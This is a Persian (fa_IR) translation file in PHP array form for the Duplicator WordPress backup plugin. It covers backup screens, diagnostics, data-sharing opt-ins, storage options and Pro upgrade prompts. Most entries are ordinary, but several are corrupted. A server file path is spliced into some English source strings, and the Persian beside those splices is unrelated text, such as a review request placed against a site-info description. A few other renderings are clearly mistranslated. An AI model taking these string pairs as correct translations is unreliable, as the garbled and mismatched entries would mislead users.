PHP version.'=>'لطفا برای ارتقاء نسخه PHP خود با ارائه دهنده خدمات میزبانی وب خود تماس بگیرید.','While your current version of Duplicator will continue to work, /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php: برای دریافت ویژگی‌ها، بهبودها و به‌روزرسانی‌های امنیتی آینده، باید نسخه PHP خود را ارتقا دهید..','Starting from Duplicator %1$s, Duplicator will require PHP %2$s or higher to receive new updates.'=>'از داپلیکیتور %1$s به بعد، داپلیکیتور برای دریافت به‌روزرسانی‌های جدید به PHP %2$s یا بالاتر نیاز خواهد داشت.','DUPLICATOR: Action Required - PHP Version Update Needed, Your site is running PHP version %s.'=>'داپلیکیتور: اقدام لازم - به‌روزرسانی نسخه PHP لازم است، سایت شما از نسخه PHP %s استفاده می‌کند.','Backup Logs'=>'لاگ‌های پشتیبانی','Go to: Duplicator > Tools > General > Information > Utils and click the "Remove Installation Files" button'=>'به: داپلیکیتور > ابزارها > عمومی > اطلاعات > کاربردها بروید و روی دکمه "حذف فایل های نصب" کلیک کنید','Backup Engine'=>'موتور پشتیبان','Skip Backup scan enabled'=>'رد شدن از اسکن پشتیبان فعال شد','Backup Size'=>'اندازه پشتیبان','File Backup Encryption'=>'رمزگذاری فایل پشتیبان','Backup Only the Database'=>'فقط از پایگاه داده پشتیبان بگیرید','Delete Backups?'=>'حذف نسخه‌های پشتیبان؟','Backup Details'=>'جزئیات پشتیبان گیری','Building Backup'=>'ساخت نسخه پشتیبان','Backup created as daf file'=>'پشتیبان به صورت فایل daf ایجاد شده است','Backup created as zip file'=>'پشتیبان گیری به صورت فایل زیپ ایجاد شده است','Select all Backups'=>'انتخاب همه پشتیبان‌ها','No Backups Found'=>'هیچ نسخه پشتیبان پیدا نشد','Backup Settings'=>'تنظیمات پشتیبان گیری','Backups Screen'=>'صفحه پشتیبان گیری','BACKUP'=>'پشتیبان گیری','Backup File Links'=>'لینک‌های فایل پشتیبان','View Backup Object'=>'مشاهده شیء پشتیبان','Backup'=>'پشتیبان گیری','Recently Backups'=>'پشتیبان‌گیری‌های اخیر','Backup creation'=>'ایجاد نسخه پشتیبان',' - Backup Export '=>' -صادرات پشتیبان ',' - Backup Edit '=>' - ویرایش پشتیبان ','Backup Read '=>'پشتیبان گیری بخوانید ','Reset Backups ?'=>'پشتیبان‌ها را ریست کنیم؟','Backup scan'=>'اسکن پشتیبان','Reset Backups'=>'تنظیم مجدد پشتیبان‌ها','Manage Backups'=>'مدیریت پشتیبان‌گیری‌ها','Schedule Backups'=>'زمانبندی پشتیبان‌گیری','Import Backups'=>'وارد کردن پشتیبان‌ها','Enjoying Duplicator? Check out a couple of our other free plugins...'=>'از Duplicator لذت می‌برید؟ چند افزونه رایگان دیگر ما را بررسی کنید...','Uncanny Automator is the easiest and most powerful way to automate your WordPress site with no code. Build automations in minutes that connect your WordPress plugins, sites and apps together using billions of recipe combinations.'=>'Uncanny Automator ساده‌ترین و قدرتمندترین راه برای خودکارسازی سایت وردپرس شما بدون کدنویسی است. در عرض چند دقیقه اتوماسیون‌هایی بسازید که افزونه‌ها، سایت‌ها و برنامه‌های وردپرس شما را با استفاده از میلیاردها ترکیب دستور العمل به هم متصل می‌کنند.','Uncanny Automator'=>'خودکار عجیب و غریب','Efficiently manage your website’s content directly from the WordPress admin with Search & Replace Everything by WPCode. This tool is essential for site migrations, content updates, or any situation where batch text and image replacements are needed.'=>'با استفاده از افزونه Search & Replace Everything by WPCode، محتوای وب‌سایت خود را مستقیماً از پنل مدیریت وردپرس به طور مؤثر مدیریت کنید. این ابزار برای انتقال سایت، به‌روزرسانی محتوا یا هر موقعیتی که نیاز به جایگزینی دسته‌ای متن و تصویر باشد، ضروری است.','Search & Replace Everything'=>'جستجو و جایگزینی همه چیز','Future proof your WordPress customizations with the most popular code snippet management plugin for WordPress. Trusted by over 1,500,000+ websites for easily adding code to WordPress right from the admin area.'=>'با محبوب‌ترین افزونه مدیریت قطعه کد برای وردپرس، سفارشی‌سازی‌های وردپرس خود را در آینده تضمین کنید. مورد اعتماد بیش از ۱,۵۰۰,۰۰۰+ وب‌سایت برای افزودن آسان کد به وردپرس درست از ناحیه مدیریت.','WPCode'=>'کد وردپرس','The ZipArchive extensions is required to create the diagnostic data.'=>'پسوندهای ZipArchive برای ایجاد داده های تشخیصی مورد نیاز است.','Downloads a ZIP archive with all relevant diagnostic information.'=>'بایگانی ZIP را با تمام اطلاعات تشخیصی مرتبط بارگیری می کند.','Get Diagnostic Data'=>'داده های تشخیصی را دریافت کنید','Utils'=>'کاربردها','Info'=>'اطلاعات','Names, slugs, versions, and if active or not'=>'نام‌ها، راک‌ها، نسخه‌ها و فعال یا غیرفعال بودن','To ensure compatibility and avoid conflicts with your installed plugins and themes.'=>'برای اطمینان از سازگاری و جلوگیری از تداخل با افزونه‌ها و قالب‌های نصب‌شده‌تان.','Plugins & Themes List'=>'فهرست افزونه‌ها و قالب‌ها','View Plugins & Themes List'=>'مشاهده لیست افزونه‌ها و قالب‌ها','Current plugin & SDK versions, and if active or uninstalled'=>'نسخه‌های فعلی افزونه و SDK، و در صورت فعال بودن یا حذف نصب بودن','View Basic Plugin Info'=>'مشاهده اطلاعات اولیه افزونه','Homepage URL & title, WP & PHP versions, and site language'=>'آدرس اینترنتی و عنوان صفحه اصلی، نسخه‌های WP و PHP و زبان سایت','To provide additional functionality that\'s relevant to your website, avoid WordPress or PHP version incompatibilities that can break your website, and recognize which languages & regions the plugin should be translated and tailored to.'=>'برای ارائه قابلیت‌های اضافی مرتبط با وب‌سایت خود، از ناسازگاری نسخه‌های وردپرس یا PHP که می‌تواند وب‌سایت شما را خراب کند، جلوگیری کنید و تشخیص دهید که افزونه باید برای کدام زبان‌ها و مناطق ترجمه و متناسب‌سازی شود.','Basic Website Info'=>'اطلاعات اولیه وب‌سایت','View Basic Website Info'=>'مشاهده اطلاعات اولیه وب‌سایت','Your WordPress user\'s: first & last name, and email address'=>'نام و نام خانوادگی و آدرس ایمیل کاربر وردپرس شما','Never miss important updates, get security warnings before they become public knowledge, and receive notifications about special offers and awesome new features.'=>'هرگز به‌روزرسانی‌های مهم را از دست ندهید، هشدارهای امنیتی را قبل از اینکه عمومی شوند، دریافت کنید و درباره پیشنهادهای ویژه و ویژگی‌های جدید فوق‌العاده، اعلان دریافت کنید.','Basic Profile Info'=>'اطلاعات پروفایل پایه','View Basic Profile Info'=>'مشاهده اطلاعات اولیه پروفایل','This will allow Duplicator to'=>'این به Duplicator اجازه می‌دهد تا','Allow & Continue'=>'اجازه دهید و ادامه دهید','Opt in to get email notifications for security & feature updates, educational content, and occasional offers, and to share some basic WordPress environment info. This will help us make the plugin more compatible with your site and better at doing what you need it to.'=>'برای دریافت اعلان‌های ایمیلی در مورد به‌روزرسانی‌های امنیتی و ویژگی‌ها، محتوای آموزشی و پیشنهادهای گاه‌به‌گاه و همچنین اشتراک‌گذاری برخی اطلاعات اولیه در مورد محیط وردپرس، گزینه «دریافت اعلان‌های ایمیلی» را انتخاب کنید. این به ما کمک می‌کند تا افزونه را با سایت شما سازگارتر کنیم و در انجام آنچه که به آن نیاز دارید، بهتر عمل کنیم.','Never miss an important update'=>'هرگز یک به‌روزرسانی مهم را از دست ندهید','ZipArchive PHP module is not installed/enabled. The current Backup cannot be opened.'=>'ماژول ZipArchive PHP نصب/فعال نشده است. نسخه پشتیبان فعلی قابل باز شدن نیست.','Failed to create zip file'=>'ایجاد فایل زیپ ناموفق بود','Archive '=>'بایگانی ','Original '=>'اصلی ','Target root path'=>'مسیر ریشه هدف','Path Not Found'=>'مسیر یافت نشد','Shell (exec)'=>'شل (مدیر اجرایی)','open_basedir'=>'مبتنی بر باز','%1$s = "is dynamic" or "value is fixed" based on settings(default) - %1$s'=>'(پیش‌فرض) - %1$s','PHP SAPI'=>'پی اچ پی ساپی','%1$s and %2$s are the opening and closing anchor tagsThis is a %1$sWordPress Setting%2$s'=>'این یک تنظیمات %1$s وردپرس است%2$s','Note: This value is the physical servers hard-drive allocation. /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php: سپس نسخه سبک را دوباره فعال کنید %1$sصفحه افزونه ها%2$s.','Unable to copy'=>'کپی کردن ممکن نیست','copied to clipboard'=>'در کلیپ بورد کپی شد','Copy to clipboard'=>'کپی در کلیپ بورد','Failed to load help content!'=>'محتوای راهنما بارگیری نشد!','Email subscription failed with message: '=>'اشتراک ایمیلی با پیام زیر ناموفق بود: ','Failed ✗'=>'ناموفق ✗','Subscribing...'=>'در حال عضویت...','Subscribed ✓'=>'مشترک ✓','Failure'=>'شکست','Loading...'=>'در حال بارگیری...','sec. stands for seconds%.2f sec.'=>'%.2f ثانیه.','Upgrade to Duplicator Pro to access our world class customer support.'=>'برای دسترسی به پشتیبانی مشتری در سطح جهانی ما، به Duplicator Pro ارتقا دهید.','View All Documentation'=>'مشاهده همه مستندات','Browse documentation, reference material, and tutorials for Duplicator.'=>'مستندات، منابع و آموزش‌های مربوط به Duplicator را مرور کنید.','View Documentation'=>'مشاهده مستندات','Related Articles'=>'مقالات مرتبط','No results found'=>'هیچ نتیجه‌ای یافت نشد','Search'=>'جستجو','%1$s and %2$s are the opening and closing tags for the link to the online docs.Could not fetch help information. Please try again later or visit the %1$sonline docs%2$s.'=>'اطلاعات راهنما دریافت نشد. لطفاً بعداً دوباره امتحان کنید یا از %1$s اسناد آنلاین %2$s دیدن کنید.','RESPONSE SUCCESS'=>'موفقیت در پاسخ','wait ...'=>'صبر کن ...','%1$s and %2$s are tagsConsider our recommended %1$shost list%2$s if you’re unhappy with your current provider'=>'اگر از ارائه دهنده فعلی خود ناراضی هستید، لیست میزبان %1$s %2$s پیشنهادی ما را در نظر بگیرید','%1s and %2s represents the opening and closing HTML tags for an anchor or linkSee the %1$shost list%2$s for reliable access to mysqldump.'=>'برای دسترسی مطمئن به mysqldump، به فهرست %1$shost%2$s مراجعه کنید.','%1s and %2s represents the opening and closing HTML tags for an anchor or linkPlease visit our recommended %1$shost list%2$s for reliable access to mysqldump.'=>'برای دسترسی مطمئن به mysqldump، لطفاً از لیست %1$shost پیشنهادی ما%2$s دیدن کنید.','%1$s and %2$s are tagsFor more details please visit the FAQ link %1$sWhich files need to be removed after an install?%2$s'=>'برای اطلاعات بیشتر، لطفاً به لینک سوالات متداول مراجعه کنید %1$sکدام فایل‌ها باید پس از نصب حذف شوند؟%2$s','1: opening link, 2: closing linkComplete the Backup build and follow the %1$sQuick Start Two-Part Install Instructions%2$s'=>'ساخت نسخه پشتیبان را تکمیل کنید و دستورالعمل‌های نصب دو قسمتی %1$sQuick Start%2$s را دنبال کنید','%1$s and %2$s represent opening and closing anchor tags- Perform a two part install as %1$sdescribed in the documentation%2$s.'=>'- نصب دو قسمتی را طبق توضیحات %1$s در مستندات %2$s انجام دهید.','%1$s and %2$s are tagsConsider trying multi-threaded support in %1$sDuplicator Pro%2$s.'=>'پشتیبانی چندرشته‌ای را در %1$sDuplicator Pro%2$s امتحان کنید.','%1$s and %2$s are tagsSee the FAQ link to adjust this hosts timeout limits: %1$sWhat can I try for Timeout Issues?%2$s'=>'برای تنظیم محدودیت‌های زمان‌بندی این میزبان‌ها، به لینک سوالات متداول مراجعه کنید: %1$sبرای مشکلات زمان‌بندی چه کاری می‌توانم انجام دهم؟%2$s','%1$s and %2$s are opening and closing tagsA copy of the database.sql and installer.php files can both be found inside of the archive.zip/daf file. Download and extract the Backup file to get a copy of the installer which will be named \'installer-backup.php\'. For details on how to extract a archive.daf file please see: %1$sHow to work with DAF files and the DupArchive extraction tool?%2$s'=>'یک کپی از فایل های database.sql و installer.php هر دو در داخل فایل archive.zip/daf یافت می شوند. فایل پشتیبان را دانلود و استخراج کنید تا یک کپی از نصب کننده به نام "installer-backup.php" دریافت کنید. برای جزئیات در مورد نحوه استخراج فایل archive.daf، لطفاً ببینید: %1$sچگونه با فایل‌های DAF و ابزار استخراج DupArchive کار کنیم؟%2$s','%1, %3 and %2, %4 are replaced with and respectivelyFor help visit the %1$sFAQ%2$s and %3$sresources page%4$s.'=>'برای کمک، به صفحه‌های سوالات متداول %1$s%2$s و منابع %3$s مراجعه کنید%4$s.','%1 and %2 are replaced with and respectivelyThis Backup contains an error. Please review the %1$sBackup log%2$s for details.'=>'این نسخه پشتیبان حاوی خطا است. لطفاً برای جزئیات بیشتر، گزارش پشتیبان‌گیری %1$s%2$s را بررسی کنید.','1 and 2 are opening and closing tagsAJAX error encountered when resetting Backups. Please see %1$sthis FAQ entry%2$s for possible resolutions.'=>'هنگام تنظیم مجدد نسخه‌های پشتیبان، خطای AJAX رخ داد. لطفاً برای راه‌حل‌های احتمالی، به %1$s این بخش از سوالات متداول %2$s مراجعه کنید.','%1$s and %2$s are tagsRECOMMENDATION: Add export capability to your role. See FAQ: %1$sWhy is the Duplicator/Packages menu missing from my admin menu?%2$s'=>'توصیه: قابلیت صادرات را به نقش خود اضافه کنید. به سؤالات متداول مراجعه کنید: %1$s چرا منوی دوبلیکیتور / بسته ها در منوی سرپرست من وجود ندارد؟ %2$s','%1s and %2s are opening and closing link tags to the documentation.Learn %1show to disable%2s.'=>'غیرفعال کردن %2ها را با %1show یاد بگیرید.','%s is an tag with a link to the current website.This email was auto-generated and sent from %s.'=>'این ایمیل به صورت خودکار ایجاد و از %s ارسال شده است.','No backups were created in the past week.'=>'در هفته گذشته هیچ نسخه پشتیبان تهیه نشده است.','Backups'=>'پشتیبان‌گیری‌ها','State'=>'ایالت','Below are the total numbers of successful and failed backups.'=>'در زیر تعداد کل پشتیبان‌گیری‌های موفق و ناموفق آمده است.','%s and %s are opening and closing link tags to the pricing page.To unlock scheduled backups, remote storages and many other features, %supgrade to PRO%s!'=>'برای باز کردن قفل پشتیبان‌گیری زمان‌بندی‌شده، ذخیره‌سازی از راه دور و بسیاری از ویژگی‌های دیگر، %s را به حرفه‌ای %s ارتقا دهید!','With Duplicator Pro you can store backups in Google Drive, Amazon S3, OneDrive, Dropbox, or any SFTP/FTP server for added protection.'=>'با استفاده از Duplicator Pro می‌توانید برای امنیت بیشتر، نسخه‌های پشتیبان را در Google Drive، Amazon S3، OneDrive، Dropbox یا هر سرور SFTP/FTP ذخیره کنید.','With Duplicator Pro you can create fully automatic backups! Schedule your preferred intervals for backups - daily, weekly, or monthly and never worry about data loss again!'=>'با Duplicator Pro می‌توانید پشتیبان‌گیری کاملاً خودکار انجام دهید! فواصل زمانی دلخواه خود را برای پشتیبان‌گیری برنامه‌ریزی کنید - روزانه، هفتگی یا ماهانه و دیگر هرگز نگران از دست دادن داده‌ها نباشید!','Did you know?'=>'آیا می‌دانستید؟','%s is the frequency of email summaries.Here\'s a quick overview of your backups in the past %s.'=>'در اینجا خلاصه‌ای از پشتیبان‌گیری‌های شما در %s گذشته آمده است.','Backups infos: Information about the Backups created and the type of components included.'=>'اطلاعات پشتیبان‌گیری: اطلاعات مربوط به پشتیبان‌های ایجاد شده و نوع اجزای موجود.','Site info: General information about the site such as database, file size, number of users, and sites in case it is a multisite. /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php: کارت عالی بود! اگر می‌توانید یک دقیقه وقت بگذارید، لطفاً با گذاشتن یک نظر پنج ستاره در WordPress.org به ما کمک کنید.','week'=>'هفته','month'=>'ماه','day'=>'روز','Monthly'=>'ماهانه','Weekly'=>'هفتگی','Daily'=>'روزانه','Never'=>'هرگز','%s is the site domainYour Weekly Duplicator Summary for %s'=>'خلاصه هفتگی شما برای %s در دستگاه کپی','Failed'=>'شکست خورده','Successful'=>'موفق','Once a Month'=>'ماهی یک بار','Once a Week'=>'هفته‌ای یک بار','Once a Day'=>'روزی یک بار','S3-Compatible (Generic) Cloudian, Cloudn, Connectria, Constant, Exoscal, Eucalyptus, Nifty, Nimbula, Minio, etc...'=>'سازگار با S3 (عمومی) Cloudian، Cloudn، Connectria، Constant، Exoscal، Eucalyptus، Nifty، Nimbula، Minio و غیره...','Wasabi'=>'واسابی','Dream Objects'=>'اشیاء رویایی','Vultr Object Storage'=>'ذخیره‌سازی شیء Vultr','DigitalOcean Spaces'=>'فضاهای دیجیتال اوشن','Cloudflare R2'=>'کلودفلر R2','Back Blaze'=>'بازگشت بلیز','Google Cloud Storage'=>'فضای ذخیره‌سازی ابری گوگل','%1$s represents the memory limit value (e.g. 256MB)If you want to build the Backup with mysqldump, increase the PHP memory_limit value in your php.ini file to at least %1$s.'=>'اگر می‌خواهید پشتیبان‌گیری را با mysqldump بسازید، مقدار memory_limit PHP را در فایل php.ini خود به حداقل %1$s افزایش دهید.','%1$s and %2$s represent opening and closing anchor tagsPlease change the setting SQL Mode to PHP Code. You can do that by opening %1$sDuplicator Pro > Settings > Backups.%2$s'=>'لطفاً تنظیمات حالت SQL را به کد پی اچ پی تغییر دهید. می‌توانید این کار را با باز کردن %1$sداپلیکیتور پرو > تنظیمات > پشتیبان ها.%2$s انجام دهید','The database size is larger than the PHP memory_limit value. This can lead into issues when building a Backup, during which the system can run out of memory. To fix this issue please consider doing one of the below mentioned recommendations.'=>'حجم پایگاه داده از مقدار memory_limit در PHP بیشتر است. این می‌تواند هنگام ایجاد نسخه پشتیبان، مشکلاتی ایجاد کند که در طی آن سیستم ممکن است با کمبود حافظه مواجه شود. برای رفع این مشکل، لطفاً یکی از توصیه‌های زیر را انجام دهید.','The database size exceeds the allowed mysqldump size limit.'=>'حجم پایگاه داده از حد مجاز حجم mysqldump تجاوز کرده است.','1$s and 2$s represent opening and closing anchor tagsIf you encounter any issues with mysqldump please change the setting SQL Mode to PHP Code. You can do that by opening %1$sDuplicator Pro > Settings > Backups.%2$s'=>'اگر با هر مشکلی در mysqldump مواجه شدید، لطفاً تنظیمات SQL Mode را به PHP Code تغییر دهید. می‌توانید این کار را با باز کردن %1$sDuplicator Pro > Settings > Backups.%2$s انجام دهید.','The database size is within the allowed mysqldump size limit.'=>'اندازه پایگاه داده در محدوده مجاز اندازه mysqldump است.','Mysqldump memory check'=>'بررسی حافظه Mysqldump','Watch video'=>'تماشای ویدیو','Next message'=>'پیام بعدی','Previous message'=>'پیام قبلی','Notifications'=>'اعلان‌ها','%1$s and %2$s represents the opening and closing HTML tags for an anchor or link.The Media Only and Custom options are not included in Duplicator Lite. To enable advanced options please %1$supgrade to Pro%2$s.'=>'این فقط رسانه و سفارشی گزینه ها در داپلیکتور لایت گنجانده نشده اند. برای فعال کردن گزینه های پیشرفته لطفا %1$sارتقا به حرفه ای%2$s.','database only quick start'=>'شروع سریع فقط با پایگاه داده','Install Time:
When installing a database only Backup please visit the '=>'زمان نصب:
هنگام نصب یک پایگاه داده فقط پشتیبان، لطفاً به آدرس مراجعه کنید ','For example, if you have WordPress 5.6 on this site and you copy this site\'s database to a host that has WordPress 5.8 files then the source code of the files will not be in sync with the database causing possible errors. This can also be true of plugins and themes. When moving only the database be sure to know the database will be compatible with ALL source code files. Please use this advanced feature with caution!'=>'به عنوان مثال، اگر وردپرس 5.6 را در این سایت دارید و پایگاه داده این سایت را در میزبانی کپی می کنید که فایل های وردپرس 5.8 دارد، کد منبع فایل ها با پایگاه داده هماهنگ نمی شود و باعث ایجاد خطاهای احتمالی می شود. این می تواند در مورد افزونه ها و پوسته ها نیز صادق باشد. هنگام جابجایی فقط پایگاه داده مطمئن شوید که پایگاه داده با همه فایل های کد منبع سازگار است. لطفاً از این ویژگی پیشرفته با احتیاط استفاده کنید!',' Notice:
Installing only the database over an existing site may have unintended consequences. Be sure to know the state of your system before installing the database without the associated files. '=>' اطلاع:
نصب فقط پایگاه داده روی یک سایت موجود ممکن است عواقب ناخواسته ای داشته باشد. قبل از نصب دیتابیس بدون فایل های مرتبط حتما از وضعیت سیستم خود مطلع شوید. ','Path Filters'=>'فیلترهای مسیر','Other'=>'دیگر','Only Active Themes'=>'فقط قالب‌های فعال','Themes'=>'تم‌ها','Only Active Plugins'=>'فقط افزونه‌های فعال','Plugins'=>'افزونه‌ها','Backup Components (Pro feature)'=>'اجزای پشتیبان (ویژگی حرفه‌ای)','Components'=>'قطعات','File extension filters allow you to exclude files with certain file extensions from the Backup e.g. zip;rar;pdf etc. Enter the file extensions you want to exclude from the Backup as a semicolon (;) seperated list.'=>'فیلترهای پسوند فایل به شما امکان می‌دهند فایل‌هایی با پسوندهای خاص مانند zip;rar;pdf و غیره را از پشتیبان‌گیری حذف کنید. پسوند فایل‌هایی را که می‌خواهید از پشتیبان‌گیری حذف شوند، به صورت لیستی که با نقطه ویرگول (;) از هم جدا شده‌اند، وارد کنید.','File filters allow you to exclude files and folders from the Backup. To enable path and extension filters check the checkbox. Enter the full path of the files and folders you want to exclude from the Backup as a semicolon (;) seperated list.'=>'فیلترهای فایل به شما امکان می‌دهند فایل‌ها و پوشه‌ها را از پشتیبان‌گیری حذف کنید. برای فعال کردن فیلترهای مسیر و افزونه، کادر انتخاب را علامت بزنید. مسیر کامل فایل‌ها و پوشه‌هایی را که می‌خواهید از پشتیبان‌گیری حذف کنید، به صورت یک لیست جدا شده با نقطه ویرگول (;) وارد کنید.','Backup components allow you to include/exclude differents part of your WordPress installation in the Backup.

Database: Include the database in the Backup.
Plugins: Include the plugins in the Backup. With the \'active only\' option enabled, only active plugins will be included in the Backup.
Themes: Include the themes in the Backup. With the \'active only\' option enabled, only active themes will be included in the Backup.
Media: Include the \'uploads\' folder.
Other: Include non-WordPress files and folders in the root directory.
'=>'اجزای پشتیبان به شما این امکان را می‌دهند که بخش‌های مختلف نصب وردپرس خود را در پشتیبان‌گیری اضافه یا حذف کنید.

پایگاه داده: پایگاه داده را در پشتیبان‌گیری قرار دهید.
افزونه‌ها. : افزونه ها را در پشتیبان گیری قرار دهید. با فعال بودن گزینه «فقط فعال»، فقط افزونه‌های فعال در پشتیبان‌گیری گنجانده می‌شوند.
موضوعات: مضامین را در پشتیبان‌گیری قرار دهید. با فعال بودن گزینه «فقط فعال»، فقط طرح‌های زمینه فعال در پشتیبان‌گیری گنجانده می‌شود.
رسانه: شامل پوشه «آپلودها» می‌شود.
سایر موارد >: فایل‌ها و پوشه‌های غیر وردپرس را در فهرست اصلی قرار دهید.
','There was an error installing the upgrade. Please try again.'=>'خطایی در نصب به‌روزرسانی رخ داده است. لطفاً دوباره امتحان کنید.','Message: '=>'پیام: ','Access'=>'دسترسی','Elevate your backup capabilities with advanced permissions, allowing for precise control over the creation, exportation, restoration, and management of control settings. Enjoy granular access control to ensure only authorized users can perform these critical functions.'=>'قابلیت‌های پشتیبان‌گیری خود را با مجوزهای پیشرفته ارتقا دهید و کنترل دقیقی بر ایجاد، استخراج، بازیابی و مدیریت تنظیمات کنترل داشته باشید. از کنترل دسترسی جزئی لذت ببرید تا مطمئن شوید که فقط کاربران مجاز می‌توانند این عملکردهای حیاتی را انجام دهند.','Advanced Backup Permissions are not available in Duplicator Lite!'=>'مجوزهای پشتیبان‌گیری پیشرفته در Duplicator Lite در دسترس نیست!',' - - Manage License Settings '=>' - - تنظیمات مجوز را مدیریت کنید ',' - Manage Settings '=>' - مدیریت تنظیمات ',' - - Backup Import '=>' - - وارد کردن نسخه پشتیبان ',' - Restore Backup '=>' - بازیابی نسخه پشتیبان ',' - - Manage Storages '=>' - - مدیریت انبارها ',' - - Manage Schedules '=>' - - مدیریت برنامه‌ها ','Administrator'=>'مدیر','It is not possible to self remove the manage settings capabilities.'=>'حذف خودکار قابلیت‌های مدیریت تنظیمات امکان‌پذیر نیست.','Some capabilities depend on others so If you select for example storage capability automatically the Backup read and Backup edit capabilities are assigned'=>'برخی قابلیت‌ها به قابلیت‌های دیگر وابسته هستند، بنابراین اگر مثلاً قابلیت ذخیره‌سازی را انتخاب کنید، قابلیت‌های خواندن و ویرایش پشتیبان‌گیری به‌طور خودکار به شما اختصاص داده می‌شوند','By default, all permissions are provided only to administrator users.'=>'به طور پیش‌فرض، تمام مجوزها فقط به کاربران مدیر ارائه می‌شود.','Select the user roles and/or users that are allowed to manage different aspects of Duplicator.'=>'نقش‌های کاربری و/یا کاربرانی را که مجاز به مدیریت جنبه‌های مختلف Duplicator هستند، انتخاب کنید.','Roles and Permissions'=>'نقش‌ها و مجوزها','Enjoy granular access control to ensure only authorized users can perform these critical functions.'=>'از کنترل دسترسی جزئی لذت ببرید تا مطمئن شوید که فقط کاربران مجاز می‌توانند این عملکردهای حیاتی را انجام دهند.','Advanced Backup Permissions'=>'مجوزهای پیشرفته پشتیبان‌گیری','https://duplicator.com/'=>'https://duplicator.com/','Having a problem with your back up or migrations? Upgrade to get our Premium Support.'=>'آیا با پشتیبان گیری یا مهاجرت خود مشکلی دارید؟ برای دریافت پشتیبانی پریمیوم ما، ارتقا دهید.','Premium Support'=>'پشتیبانی پریمیوم','As a valued Duplicator Lite user you receive %1$d%% off, automatically applied at checkout!'=>'به‌عنوان یک کاربر ارزشمند داپلیکیتور لایت، %1$d%% تخفیف دریافت می‌کنید که به‌طور خودکار هنگام تسویه‌حساب اعمال می‌شود!','You\'re using Duplicator Lite - no license needed. Enjoy!'=>'شما از Duplicator Lite استفاده می‌کنید - نیازی به مجوز نیست. لذت ببرید!','Available with Duplicator Pro!'=>'با Duplicator Pro موجود است!','Get tips and product updates straight to your inbox.'=>'نکات و به‌روزرسانی‌های محصول را مستقیماً در صندوق ورودی خود دریافت کنید.','Subscribe'=>'اشتراک','Email Address'=>'آدرس ایمیل','Upgrade to Duplicator Pro Now'=>'همین حالا به نسخه Duplicator Pro ارتقا دهید','Upgrade Now & Save!'=>'همین حالا ارتقا دهید و ذخیره کنید!','Upgrade to Pro to Unlock...'=>'برای باز کردن قفل به نسخه حرفه‌ای ارتقا دهید...','Upgrade To Pro'=>'ارتقا به نسخه حرفه‌ای','Did you know Duplicator Pro has: %s?'=>'آیا می‌دانستید که Duplicator Pro دارای: %s است؟','Bonus: Duplicator Lite users get %1$d%% off regular price,automatically applied at checkout.'=>'پاداش: کاربران داپلیکیتور لایت %1$d%% تخفیف از قیمت معمولی دریافت می‌کنند که به‌طور خودکار هنگام تسویه‌حساب اعمال می‌شود.','Get Duplicator Pro Today and Unlock all the Powerful Features »'=>'همین امروز Duplicator Pro را دریافت کنید و تمام ویژگی‌های قدرتمند آن را آزاد کنید »','Pro Features:'=>'ویژگی‌های حرفه‌ای:','We know that you will truly love Duplicator. It has over 4000+ five star ratings (%s) and is active on over 1 million websites.'=>'ما می‌دانیم که شما واقعاً عاشق Duplicator خواهید شد. این افزونه بیش از ۴۰۰۰+ امتیاز پنج ستاره (%s) دارد و در بیش از ۱ میلیون وب‌سایت فعال است.','Thanks for being a loyal Duplicator Lite user. Upgrade to Duplicator Pro to unlock all the awesome features and experience why Duplicator is consistently rated the best WordPress migration plugin.'=>'از اینکه کاربر وفادار Duplicator Lite هستید متشکریم. برای باز کردن تمام ویژگی‌های فوق‌العاده و تجربه اینکه چرا Duplicator به طور مداوم به عنوان بهترین افزونه انتقال وردپرس رتبه‌بندی می‌شود، به Duplicator Pro ارتقا دهید.','Dismiss this message'=>'این پیام را رد کنید','Not set'=>'تنظیم نشده','Recovery Point'=>'نقطه بازیابی','%s Template'=>'الگوی %s','%s Storage'=>'%s ذخیره سازی','%s Schedule'=>'%s برنامه','Dismiss recommended plugin'=>'افزونه پیشنهادی را رد کنید','Install'=>'نصب','Recommended Plugin:'=>'افزونه پیشنهادی:','Backups: %1$d, Failures: %2$d'=>'پشتیبان‌گیری‌ها: %1$d، خرابی‌ها: %2$d','Last backup:'=>'آخرین نسخه پشتیبان:','This will create a new Backup. If a Backup is currently running then this button will be disabled.'=>'این یک نسخه پشتیبان جدید ایجاد می‌کند. اگر در حال حاضر نسخه پشتیبان در حال اجرا باشد، این دکمه غیرفعال خواهد بود.','Remote storages are not available in Duplicator Lite!'=>'ذخیره‌سازی‌های از راه دور در Duplicator Lite در دسترس نیستند!','Manually transfer backups to remote storages!'=>'انتقال دستی نسخه‌های پشتیبان به حافظه‌های راه دور!','With manual transfers you can upload your backup to remote storages even after you have created them.'=>'با انتقال دستی، می‌توانید نسخه پشتیبان خود را حتی پس از ایجاد آنها، در حافظه‌های راه دور بارگذاری کنید.','Easily customize your backups with templates!'=>'به راحتی پشتیبان گیری های خود را با قالب ها سفارشی کنید!','Instead of manually configuring the same themes and plugins over and over, just configure one site and bundle it into a Duplicator Backup. Install the Backup to create a pre-configured site on as many locations as you want!'=>'به جای پیکربندی دستی قالب‌ها و افزونه‌های یکسان، فقط یک سایت را پیکربندی کنید و آن را در یک نسخه پشتیبان Duplicator قرار دهید. نسخه پشتیبان را نصب کنید تا یک سایت از پیش پیکربندی شده در هر مکانی که می‌خواهید ایجاد کنید!','If you install the same theme, plugins or content on all your WordPress sites then Duplicator can save you a lot of time.'=>'اگر قالب، افزونه‌ها یا محتوای یکسانی را در تمام سایت‌های وردپرس خود نصب می‌کنید، Duplicator می‌تواند در زمان شما صرفه‌جویی زیادی کند.','Total: %s'=>'مجموع: %s','Add New'=>'اضافه کردن جدید','Back up to Dropbox, FTP, Google Drive, OneDrive, Amazon S3 or Amazon S3 compatible for safe off-site storage.'=>'برای ذخیره‌سازی امن خارج از سایت، از فایل‌های پشتیبان خود در دراپ‌باکس، FTP، گوگل درایو، وان‌درایو، آمازون S3 یا سازگار با آمازون S3 استفاده کنید.','Remote Cloud Backups is a PRO feature'=>'پشتیبان‌گیری از راه دور در فضای ابری یک ویژگی حرفه‌ای است','Store to Multiple Endpoints with Duplicator Pro'=>'با استفاده از Duplicator Pro، در چندین نقطه پایانی ذخیره کنید','Duplicator Lite does not support scheduled backups!'=>'Duplicator Lite از پشتیبان‌گیری زمان‌بندی‌شده پشتیبانی نمی‌کند!','Automate your workflow with scheduled backups!'=>'با پشتیبان‌گیری زمان‌بندی‌شده، گردش کار خود را خودکار کنید!','Supported 